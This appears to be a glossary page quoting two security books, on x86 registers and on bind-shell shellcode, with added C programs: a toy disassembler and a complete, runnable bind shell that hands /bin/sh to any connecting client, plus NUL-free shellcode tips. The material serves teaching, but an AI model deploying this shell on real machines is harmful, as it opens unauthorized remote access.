
Langy definition

Alijohn Ghassemlouei, Russ Rogers, in The Hacker's Guide to OS X, 2013

Decompiling Journey

Now that we've created our vulnerable test application, we're going to continue down the road a bit further, into the realm of assembly analysis and decompiling. To do that we're going to need some background on the guts of assembly mnemonics, and how they interact with the machine code in the compiled application.

Assembly is, in most cases, a 1 to 1 instruction match with machine code. What we mean by this is that one block of machine code (10110) will directly translate to one assembly instruction (mov). What this allows us to do is to use a program like OllyDbg or IDA (Interactive Disassembler) to recover that assembly code and, with a decompiler, to further translate it into a higher level programming language such as C, C++, Objective-C, and so on. We'll not be covering IDA in this book due to the cost of the commercial application for the readers (it does have a demo for limited evaluation, and a freeware version for Windows that is a few updates behind), but if you want a future career in reverse code engineering you will inevitably be crossing paths with IDA.

CPU Registers

In a 32-bit system the register length is 32 bits, as you may have already guessed. Many home computers still run at 32 bits, although most are migrating to the newer, faster architecture, known as x86-64. When the x86-64 architecture was released, the designers needed to extend the CPU registers beyond the original register length to, you guessed again, 64 bits. The four non-pointer, non-index general registers are usually then broken down into four divisions in a 64-bit system: the full 64-bit register (RAX), its low 32 bits (EAX), its low 16 bits (AX) and its low 8 bits (AL).

EAX - The Accumulator Register is used for operands and result data.
EBX - The Base Register is used to hold a pointer to data.
ECX - The Counter Register is used in loop and string operations.
EDX - The Data Register is used as a data input/output register.
ESI/EDI - The Source Index and Destination Index Registers are used in memory and string operations.
ESP - The Stack Pointer Register is used to point to the top of the stack (always).
EBP - The Base Pointer Register is used to reference function arguments and local variables in the current stack frame. The EBP is also known as the "Frame Pointer."
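Two of the points above can be seen by decoding a few bytes by hand: each machine-code byte sequence maps to exactly one assembly instruction, and one 3-bit register number names RAX, EAX, AX or AL depending only on the operand size of the instruction. The C program below is an added example written for this page, not code from The Hacker's Guide to OS X or from IDA. It is a deliberately tiny x86-64 decoder (push/pop, register-to-register mov and xor, mov-immediate, syscall, int, leave, ret; the r8-r15 extensions, memory operands and 64-bit immediates are left out) run over a constructed 17-byte Linux exit(11) stub that was hand-assembled for this example. Besides the 1:1 translation it shows, in the `xor eax, eax` / `mov al, 0x3c` pair, why shellcode writes the 8-bit view of a register: `mov eax, 0x3c` would encode with three 0x00 bytes, `mov al, 0x3c` with none.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Register names by operand size. Index 0..7 is the 3-bit register number
 * taken from the opcode or ModRM byte; the same number names RAX, EAX, AX
 * or AL depending only on operand size. Without a REX prefix the 8-bit
 * numbers 4..7 are the legacy high bytes AH..BH. */
static const char *reg_name(int size, int num) {
    static const char *r64[] = {"rax","rcx","rdx","rbx","rsp","rbp","rsi","rdi"};
    static const char *r32[] = {"eax","ecx","edx","ebx","esp","ebp","esi","edi"};
    static const char *r16[] = {"ax","cx","dx","bx","sp","bp","si","di"};
    static const char *r8[]  = {"al","cl","dl","bl","ah","ch","dh","bh"};
    switch (size) {
        case 64: return r64[num & 7];
        case 32: return r32[num & 7];
        case 16: return r16[num & 7];
        default: return r8[num & 7];
    }
}

/* Decode one 64-bit-mode instruction from p[0..n) into Intel-syntax text.
 * Returns the number of bytes consumed, or 0 if the encoding is outside
 * this toy subset or the buffer is truncated. */
size_t decode_one(const uint8_t *p, size_t n, char *out, size_t outsz) {
    size_t i = 0;
    int size = 32;                                   /* default operand size */
    if (i < n && p[i] == 0x66) { size = 16; i++; }  /* operand-size prefix */
    if (i < n && (p[i] & 0xF0) == 0x40) {            /* REX prefix 0100WRXB */
        if (p[i] & 0x07) return 0;                   /* R/X/B (r8-r15) not handled */
        if (p[i] & 0x08) size = 64;                  /* REX.W: 64-bit operands */
        i++;
    }
    if (i >= n) return 0;
    uint8_t op = p[i++];

    if (op >= 0x50 && op <= 0x5F) {                  /* push/pop r64 (64-bit default) */
        snprintf(out, outsz, "%s %s", op < 0x58 ? "push" : "pop", reg_name(64, op & 7));
        return i;
    }
    if (op == 0x88 || op == 0x89 || op == 0x30 || op == 0x31) { /* mov/xor r/m, reg */
        if (i >= n || (p[i] >> 6) != 3) return 0;    /* register-direct form only */
        int sz = (op == 0x88 || op == 0x30) ? 8 : size;
        uint8_t modrm = p[i++];
        snprintf(out, outsz, "%s %s, %s", (op & 0xFE) == 0x88 ? "mov" : "xor",
                 reg_name(sz, modrm & 7), reg_name(sz, (modrm >> 3) & 7));
        return i;
    }
    if (op >= 0xB0 && op <= 0xB7) {                  /* mov r8, imm8 */
        if (i >= n) return 0;
        snprintf(out, outsz, "mov %s, 0x%x", reg_name(8, op & 7), (unsigned)p[i]);
        return i + 1;
    }
    if (op >= 0xB8 && op <= 0xBF) {                  /* mov r16/r32, imm16/imm32 */
        if (size == 64) return 0;                    /* REX.W form takes imm64: skipped */
        size_t w = (size_t)size / 8;
        if (i + w > n) return 0;
        uint32_t imm = 0;
        for (size_t k = 0; k < w; k++) imm |= (uint32_t)p[i + k] << (8 * k);
        snprintf(out, outsz, "mov %s, 0x%x", reg_name(size, op & 7), imm);
        return i + w;
    }
    if (op == 0x0F) {                                /* two-byte opcode: only syscall */
        if (i < n && p[i] == 0x05) { snprintf(out, outsz, "syscall"); return i + 1; }
        return 0;
    }
    if (op == 0xCD) {                                /* int imm8 */
        if (i >= n) return 0;
        snprintf(out, outsz, "int 0x%x", (unsigned)p[i]);
        return i + 1;
    }
    if (op == 0xC9) { snprintf(out, outsz, "leave"); return i; }
    if (op == 0xC3) { snprintf(out, outsz, "ret");   return i; }
    return 0;
}

/* Walk a buffer printing offset, raw bytes and mnemonic; returns the number
 * of instructions decoded and stops at the first byte it cannot decode. */
size_t disassemble(const uint8_t *buf, size_t n) {
    size_t off = 0, count = 0;
    char text[64];
    while (off < n) {
        size_t len = decode_one(buf + off, n - off, text, sizeof text);
        if (len == 0) { printf("%04zx: db 0x%02x   ; not in this toy table\n", off, buf[off]); break; }
        printf("%04zx: ", off);
        for (size_t k = 0; k < 5; k++)               /* raw bytes, padded to 5 columns */
            if (k < len) printf("%02x ", buf[off + k]); else printf("   ");
        printf(" %s\n", text);
        off += len;
        count++;
    }
    return count;
}

/* Constructed sample (hand-assembled for this example): a 64-bit Linux
 * function that sets up a frame pointer and calls exit(11) via syscall 60. */
const uint8_t sample_exit11[] = {
    0x55,                          /* push rbp                */
    0x48, 0x89, 0xE5,              /* mov rbp, rsp            */
    0x31, 0xC0,                    /* xor eax, eax            */
    0xB0, 0x3C,                    /* mov al, 0x3c (NUL-free) */
    0xBF, 0x0B, 0x00, 0x00, 0x00,  /* mov edi, 0xb            */
    0x0F, 0x05,                    /* syscall                 */
    0xC9,                          /* leave                   */
    0xC3,                          /* ret                     */
};

int main(void) {
    size_t n = disassemble(sample_exit11, sizeof sample_exit11);
    printf("%zu instructions decoded from %zu bytes\n", n, sizeof sample_exit11);
    return 0;
}
```

Build with `cc -std=c99 -Wall` and run. The listing it prints is the same 1:1 mapping the text describes: `55` is `push rbp`, `48 89 e5` is the `mov rbp, rsp` that turns EBP/RBP into the frame pointer, and `31 c0` then `b0 3c` use the 32-bit and 8-bit views of the same register 0.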

Foster, Mike Price, in Sockets, Shellcode, Porting, & Coding, 2005

Analysis

In order to bind a shell to a port, we need to execute the socket (line 14), bind (line 15), listen (line 16), accept (line 17), dup2 (lines 18 through 20), and execve (line 21) system calls successfully.

The socket system call (line 14) is very easy because all of its arguments are integers. When the socket system call is executed, we have to store its return value in a safe place, because that value has to be used as the argument of the bind, listen, and accept system calls. The bind system call is the most difficult because it requires a pointer to a structure. We therefore need to build the structure and get a pointer to it the same way we have built and obtained pointers to strings: by pushing it on the stack.

After the accept system call is executed, we get a file descriptor for the accepted connection. This file descriptor allows us to communicate over the socket. Because we want to give the connected person an interactive shell, we duplicate stdin, stdout, and stderr onto the socket (lines 18 through 20), and then execute the shell (line 21). Because stdin, stdout, and stderr are dup'ed to the socket, everything sent to the socket will be sent to the shell, and everything written to stdout or stderr by the shell is sent to the socket.
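The same sequence as an added C program, written for this page and not taken from the book (the book's version is hand-written assembly making the system calls directly). It performs socket, bind, listen, accept, three dup2 calls and execve through the libc wrappers, with comments mapping each call to the line numbers the analysis uses. A helper also shows the one part the text calls the hardest, the sockaddr_in structure that shellcode has to assemble on the stack, both as the raw bytes and as the 32-bit constant a single `push imm32` would place there. Port 4444 and /bin/sh are arbitrary choices for the example; the byte layout assumes Linux, where sin_family is a 16-bit field holding AF_INET = 2. Running main binds a real listening shell on the given port, so do that only on a lab machine.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* The sockaddr_in the shellcode must build on the stack, as raw bytes
 * (Linux layout assumed): sin_family = AF_INET (2) as a little-endian
 * 16-bit field, sin_port in network byte order, sin_addr = INADDR_ANY. */
void sockaddr_in_bytes(uint16_t port, uint8_t out[8]) {
    out[0] = 2;               /* AF_INET, low byte              */
    out[1] = 0;               /* AF_INET, high byte             */
    out[2] = port >> 8;       /* port, most significant byte    */
    out[3] = port & 0xff;     /* port, least significant byte   */
    memset(out + 4, 0, 4);    /* 0.0.0.0: listen on every interface */
}

/* The 32-bit constant one "push imm32" places at the start of that
 * structure on a little-endian stack (0x5c110002 for port 4444). */
uint32_t sockaddr_push_dword(uint16_t port) {
    uint8_t b[8];
    sockaddr_in_bytes(port, b);
    return (uint32_t)b[0] | (uint32_t)b[1] << 8 | (uint32_t)b[2] << 16 | (uint32_t)b[3] << 24;
}

/* 1 if any byte of v is 0x00: such a constant cannot appear literally in
 * shellcode that is delivered through a C string copy. */
int dword_has_nul(uint32_t v) {
    for (int k = 0; k < 4; k++)
        if (((v >> (8 * k)) & 0xff) == 0) return 1;
    return 0;
}

/* Make fd serve as the process's stdin, stdout and stderr (lines 18-20). */
int dup_to_stdio(int fd) {
    for (int std = 0; std < 3; std++)
        if (dup2(fd, std) < 0) return -1;
    return 0;
}

/* The full sequence from the analysis. Blocks in accept() until a client
 * connects; on success it never returns, because execve replaces the process. */
int bind_shell(uint16_t port) {
    int srv = socket(AF_INET, SOCK_STREAM, 0);               /* line 14: keep this fd */
    if (srv < 0) return -1;
    int one = 1;                                             /* convenience for repeated lab runs */
    setsockopt(srv, SOL_SOCKET, SO_REUSEADDR, &one, sizeof one);

    struct sockaddr_in sa;                                   /* the structure bind needs a pointer to */
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr.s_addr = htonl(INADDR_ANY);
    if (bind(srv, (struct sockaddr *)&sa, sizeof sa) < 0) return -1;  /* line 15 */
    if (listen(srv, 1) < 0) return -1;                               /* line 16 */

    int cli = accept(srv, NULL, NULL);                               /* line 17: new fd for the connection */
    if (cli < 0) return -1;
    if (dup_to_stdio(cli) < 0) return -1;                            /* lines 18-20 */

    char *const sh_argv[] = { "/bin/sh", NULL };
    execve("/bin/sh", sh_argv, NULL);                                /* line 21 */
    return -1;                                                       /* only reached if execve failed */
}

int main(int argc, char **argv) {
    if (argc != 2) { fprintf(stderr, "usage: %s <port>\n", argv[0]); return 2; }
    uint16_t port = (uint16_t)atoi(argv[1]);
    uint32_t d = sockaddr_push_dword(port);
    printf("push 0x%08x builds sockaddr_in for port %u%s\n", d, port,
           dword_has_nul(d) ? " (contains a NUL byte)" : "");
    if (bind_shell(port) < 0) { perror("bind_shell"); return 1; }
    return 0;
}
```

Build with `cc -std=c99 -Wall`, run `./a.out 4444` on a lab host, and connect with `nc 127.0.0.1 4444`; because fds 0, 1 and 2 are duplicates of the connection, what you type reaches the shell and its output comes back over the socket. Note that the constant for port 4444, 0x5c110002, contains a 0x00 byte from the high half of sin_family, so shellcode that must be NUL-free cannot push it as a literal and has to construct that word from a zeroed register instead.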